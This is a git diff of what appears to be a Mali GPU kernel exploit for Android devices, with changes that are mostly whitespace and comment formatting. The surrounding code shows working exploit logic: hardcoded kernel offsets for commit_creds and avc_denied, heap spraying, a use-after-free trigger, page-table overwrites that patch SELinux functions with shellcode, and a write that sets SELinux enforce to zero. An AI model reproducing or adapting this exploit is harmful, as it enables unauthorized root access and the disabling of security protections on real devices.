diff --git a/mali_shrinker_mmap32.c b/mali_shrinker_mmap32.c index ecead8e..6b8b388 100644 --- a/mali_shrinker_mmap32.c +++ b/mali_shrinker_mmap32.c @@ -88,7 +88,7 @@ ADD_INIT = add x0, x0, #0x(Last 3 digits of INIT_CRED) #define COMMIT_CREDS_CTX_01_00_000 0x5a120 // 0xffffff80080da120 - 0xffffff8008080000 = 0x5a120 #define ADD_INIT_CTX_01_00_000 0x910fc000 #define ADD_COMMIT_CTX_01_00_000 0x91048108 -#define AVC_DENY_CTX_01_00_000 0x35acc8 // 0xffffff80083dacc8 - 0xffffff8008080000 = 0x35ACC8;//add +#define AVC_DENY_CTX_01_00_000 0x35acc8 // 0xffffff80083dacc8 - 0xffffff8008080000 = 0x35ACC8 //add /* * Maintained by Syuugo @@ -228,7 +228,7 @@ void setup_mali(int fd, int group_id) { if (ioctl(fd, KBASE_IOCTL_VERSION_CHECK, ¶m) < 0) { err(1, "version check failed\n"); } - // struct kbase_ioctl_set_flags set_flags = {group_id << 3}; + //struct kbase_ioctl_set_flags set_flags = {group_id << 3}; struct kbase_ioctl_set_flags set_flags = {0}; if (ioctl(fd, KBASE_IOCTL_SET_FLAGS, &set_flags) < 0) { err(1, "set flags failed\n"); @@ -342,7 +342,7 @@ void mem_commit(int fd, uint64_t gpu_addr, uint64_t pages) { uint64_t map_gpu(int mali_fd, unsigned int va_pages, unsigned int commit_pages, bool read_only, int group) { union kbase_ioctl_mem_alloc alloc = {0}; - alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR; //| (group << 22); + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR; // | (group << 22); int prot = PROT_READ; if (!read_only) { alloc.in.flags |= BASE_MEM_PROT_GPU_WR; @@ -439,7 +439,8 @@ void reserve_pages(int mali_fd, int pages, int nents, uint64_t* reserved_va) { alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR; // | (1 << 22); int prot = PROT_READ | PROT_WRITE; alloc.in.va_pages = pages; - alloc.in.commit_pages = pages; // alloc.in.commit_pages = 0; + //alloc.in.commit_pages = 0; + alloc.in.commit_pages = pages; mem_alloc(mali_fd, &alloc); reserved_va[i] = alloc.out.gpu_va; } @@ -512,7 +513,7 @@ int find_freed_idx(int mali_fd) { } int find_pgd(int freed_idx, int start_pg) { - printf("find_pgd, freed_idx is %d start_pg is %d \n",freed_idx, start_pg); + printf("find_pgd, freed_idx is %d start_pg is %d \n",freed_idx, start_pg); uint64_t* this_alias = alias_regions[freed_idx]; printf("find_pgd, freed_idx is %d start_pg is %d \n",freed_idx, start_pg); for (int pg = start_pg; pg < SPRAY_PAGES; pg++) { @@ -659,10 +660,9 @@ void write_data(int mali_fd, uint64_t data, uint64_t* reserved, uint64_t size, u } } - void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size) { -printf("write_func called with code_size = %llu\n", code_size); -usleep(300000); + printf("write_func called with code_size = %llu\n", code_size); + usleep(300000); uint64_t func_offset = (func + KERNEL_BASE) % 0x1000; uint64_t curr_overwrite_addr = 0; for (int i = 0; i < size; i++) { @@ -701,9 +701,9 @@ int run_enforce() { int run_enforce_write() { char result = '0'; sleep(3); - LOG("run_enforce_write before open %d\n", result); + LOG("run_enforce_write before open %d\n", result); int enforce_fd = open("/sys/fs/selinux/enforce", O_WRONLY); - LOG("run_enforce_write before write\n"); + LOG("run_enforce_write before write\n"); write(enforce_fd, &result, 1); LOG("run_enforce_write before close\n"); close(enforce_fd); @@ -820,26 +820,27 @@ void write_selinux(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved) write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), selinux_enforcing_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); usleep(300000); - //Go through the reserve pages addresses to write to avc_denied with our own shellcode + // Go through the reserve pages addresses to write to avc_denied with our own shellcode write_data(mali_fd2, selinux_enforcing, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, 0, MALI_WRITE_VALUE_TYPE_IMMEDIATE_32); } void write_shellcode(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved) { -/* uint64_t avc_deny_addr = (((avc_deny + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443; +/* + uint64_t avc_deny_addr = (((avc_deny + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443; write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), avc_deny_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); usleep(100000); - //Go through the reserve pages addresses to write to avc_denied with our own shellcode + // Go through the reserve pages addresses to write to avc_denied with our own shellcode write_func(mali_fd2, avc_deny, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(permissive[0]), sizeof(permissive)/sizeof(uint32_t)); - //Triggers avc_denied to disable SELinux + // Triggers avc_denied to disable SELinux open("/dev/kmsg", O_RDONLY); */ //uint64_t sel_read_enforce_addr = (((selinux_enforcing_READ + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT) | 0x443; //write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_enforce_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); //printf("sel_read_enforce_addr is %llx avc_deny_addr is %llx\n", sel_read_enforce_addr, avc_deny_addr); - uint64_t sel_read_handle_unknown_addr = (((sel_read_handle_unknown + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443; + uint64_t sel_read_handle_unknown_addr = (((sel_read_handle_unknown + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443; write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_handle_unknown_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); //uint64_t sel_write_enforce_addr = (((selinux_enforcing_WRITE + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT) | 0x443; @@ -853,7 +854,6 @@ void write_shellcode(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved //write_func(mali_fd2, selinux_enforcing_WRITE, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t)); } - void spray(int mali_fd) { for (int j = 0; j < SPRAY_NUM; j++) { union kbase_ioctl_mem_alloc alloc = {0}; @@ -909,7 +909,7 @@ int trigger(int mali_fd, int mali_fd2, int* flush_idx) { release_mem_pool(mali_fd, drain); printf("release_mem_pool\n"); jit_free(mali_fd, atom_number, jit_id); - printf("reserve pages here\n"); + printf("reserve pages here\n"); reserve_pages(mali_fd2, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0])); LOG("jit_freed\n");